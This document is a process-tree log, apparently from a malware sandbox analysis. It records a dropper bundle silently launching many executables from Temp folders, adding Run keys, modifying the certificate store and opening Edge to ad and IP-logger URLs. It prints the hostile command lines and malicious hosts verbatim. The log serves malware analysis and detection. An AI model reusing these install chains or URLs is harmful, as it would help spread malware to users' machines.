- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-B6HBL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-B6HBL.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe"C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\3f-fe243-5f2-f40b5-437db1a298253\Dogisholale.exe"C:\Users\Admin\AppData\Local\Temp\3f-fe243-5f2-f40b5-437db1a298253\Dogisholale.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
C:\Users\Admin\AppData\Local\Temp\11-3c477-76a-96e97-aadf98adae467\Punyrazhewy.exe"C:\Users\Admin\AppData\Local\Temp\11-3c477-76a-96e97-aadf98adae467\Punyrazhewy.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exeC:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SID=778 CID=778 SILENT=1 /quiet11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10004 -s 23612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exeC:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe /qn CAMPAIGN="654"11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exeC:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe"C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe" -u12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exeC:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exe11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exe /mixfive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9944 -s 24812⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe /verysilent & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exeC:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe /verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2CSQR.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-2CSQR.tmp\FastPC.tmp" /SL5="$A01E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe" /verysilent12⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-MR2GN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MR2GN.tmp\Setup.exe" /Verysilent13⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\FastPc\FastPc\Faster.exe"C:\Program Files (x86)\FastPc\FastPc\Faster.exe"14⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6000 -s 76815⤵
- Program crash
-
C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe"C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4UNJA.tmp\FastPCV.tmp"C:\Users\Admin\AppData\Local\Temp\is-4UNJA.tmp\FastPCV.tmp" /SL5="$40324,138429,56832,C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent15⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3N736.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3N736.tmp\Setup.exe" /Verysilent16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 88417⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 100417⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 101217⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 109217⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 110817⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 108017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 148817⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 177617⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 176417⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 184017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 131217⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 192017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\System32\gpupdate.exe" /force14⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im chrome.exe14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe15⤵
- Kills process with taskkill
-
C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exeC:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exe /qn CAMPAIGN=65411⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3vtadfb.5ht\autosubplayer.exe /S & exit10⤵
-
C:\Users\Admin\Pictures\Adobe Films\WBiir5hGlETmLNsUlwQONX_F.exe"C:\Users\Admin\Pictures\Adobe Films\WBiir5hGlETmLNsUlwQONX_F.exe"6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeWed0971f17486f8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09e95ff6b5.exeWed09e95ff6b5.exe5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\mm.exe"C:\Users\Admin\AppData\Local\Temp\mm.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 3007⤵
- Program crash
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji77⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1348 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5804 /prefetch:28⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6684 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5164 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6888 /prefetch:88⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=3544 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:18⤵
-
